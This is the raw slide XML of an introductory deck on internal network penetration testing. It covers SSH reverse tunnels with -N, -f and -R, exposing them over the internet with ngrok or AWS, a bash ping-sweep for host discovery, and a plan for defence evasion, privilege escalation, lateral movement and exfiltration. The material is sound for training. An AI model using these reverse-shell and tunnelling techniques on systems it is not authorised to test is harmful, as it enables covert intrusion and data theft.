            <a:t>Make a throwaway account on your attacking machine (SSHD Server) with the permissions of /bin/false, preventing third parties from compromising the connection.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2149077" y="686"/>
        <a:ext cx="6447234" cy="95870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11/5/2021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06593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11/5/2021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206273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11/5/2021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32383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11/5/2021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311707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11/5/2021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9446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11/5/2021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4235903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157047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259072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t>11/5/2021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947477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t>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196603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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}"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578041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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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758660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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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57514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DB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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546834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9413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t>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4136768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2EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2021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928589751"/>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qeebhussain122/portninja/tree/master/code/scanner/raw_pyth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redhat.com/sysadmin/ssh-dynamic-port-forward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A group of toothbrushes&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03FE2716-7A29-4BA1-8A75-D042DC964F0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88" r="-1" b="170"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12188932" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D54E649E-FCFC-4D42-92F0-153BC374E0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861099" y="2578214"/>
            <a:ext cx="10466773" cy="2490935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction to Internal Network Penetration Testing - Offensive Security Tactics for Linux Professionals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17269484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4B7F-9F65-4D56-A703-46E725552BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Adding SSH Reverse Shell Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB2BBAF-27E5-4DD2-8441-D2F4751CDDEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813877363"/>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743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CC2CD-A5E5-4B04-9F4C-4E9056996EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Defensive SSH Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7370CEA7-49DE-453B-B70F-56BA565CD7EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Although the objective is to conduct offensive security, defensive measures must be taken to protect your own assets when infiltrating target machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH –N: No remote command execution, preventing the /bin/false account from returning an error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH –f: Background the SSH shell, handy for when the SSH link is simply a proxy link and can be stealthy for phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH –R: Reverse SSH tunnelling. Binding the SSH port to a remotely available attacker port, allowing for a secondary protected communications channel with use of –N.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345682073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A74A-562A-4445-A862-C3770DAF35EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH Reverse Shell in Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC7BFD2-2454-435E-B658-AF49D1C33B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1417715"/>
            <a:ext cx="3771900" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758D1DB3-AB97-4C88-9D8C-DF6CA241D19B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="21852" b="56050"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1844977"/>
            <a:ext cx="5791200" cy="980812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED7D475-F75F-4242-9071-17B534BD0E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2929317"/>
            <a:ext cx="5295900" cy="771525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4201676F-28EB-4562-B6C9-6F57542DEA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect b="50000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="3841712"/>
            <a:ext cx="7820025" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DC6BB7-D872-41F5-96A2-3D4D8888E82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="4259565"/>
            <a:ext cx="4972050" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3983703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BAD75-F8AC-4936-9D2E-A02E4938238B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH Reverse Shells for WAN (Wide Area Networks)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78AD61B7-8744-4399-ADD8-69B1C77BED44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Expanding upon the previous slide, it is possible to establish such reverse SSH tunnels to internet facing hosts such as AWS. Using device such as Raspberry Pi’s which are connected to the internal network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If internet available services (AWS) are off-scope: It is possible to make use of a TCP tunnelling tool named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. Which allows TCP port forwarding for tunnels (SSH) to become available over WAN (Internet).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Allowing for reverse shells to be used without any internet services or even a Pi if a physical penetration test is not in scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281987378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E4C3-713B-458D-BA38-E75A7B4FD384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Host Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF94F6E-89DC-4348-AA7B-8DA9EA4E6068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Host discovery is the process of discovering hosts on the internal network. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Host discovery can usually be conducted automatically by tools such as NMAP, but within the internal network; a makeshift solution is needed such as: for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in {1..255}; do ping –c 1 (Internal 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>octects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>).$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>; done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using the internal bash shell to discover hosts in the internal network can help us to discover potential targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ICMP has potential of being blocked, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Python can be used equally as well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to discover hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2324515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57A9-5C3B-4A2D-9110-02A791B1A4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How to port scan internally?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437B002E-CF5E-4B05-90EF-206D35956A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Once inside the network you are using the target machine as your grounds of operations, meaning your fancy tools (NMAP, Ncat, Sparta) are not going to be available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>HPC environments are supposed to contain programming languages, using LOTL tactics, we can use these languages and make our own tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Alternatively, we can use our fancy tools from our attacking machine via Proxychains, however in certain attack scenarios such as targeting IPv6 this may not always work so well. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339207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5BA6-DA48-4A49-91CE-96064ACE0083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port scanning: Method 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0350FABF-8AA2-4261-9249-0C04D93C46D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94806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35BA6-DA48-4A49-91CE-96064ACE0083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port scanning: Method 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0350FABF-8AA2-4261-9249-0C04D93C46D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97949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8B84-F69F-44FA-98D3-79F104BC0279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I’ve done my recon. What do I do now?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D387DC4-8176-457A-9A47-930FBDA6CDC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Internal Testing is 60% Recon / 40% Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>1. Enumerating the ports, gathering deeper information on our target. (Further Enumeration) (20% Recon)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>2. Attempt to evade any defences. (Defence Evasion) (20% Recon)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>3. Attempt to escalate privileges within our beachhead machine. (40% Exploitation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>4. Attempt lateral movement to deeper subnets and exfiltrate information (Post-exploitation) (20% Recon)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195347313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1398-1790-48B9-921E-EC68F4EC5FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABA9841B-C4B5-4725-9CA8-8500FADB75BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
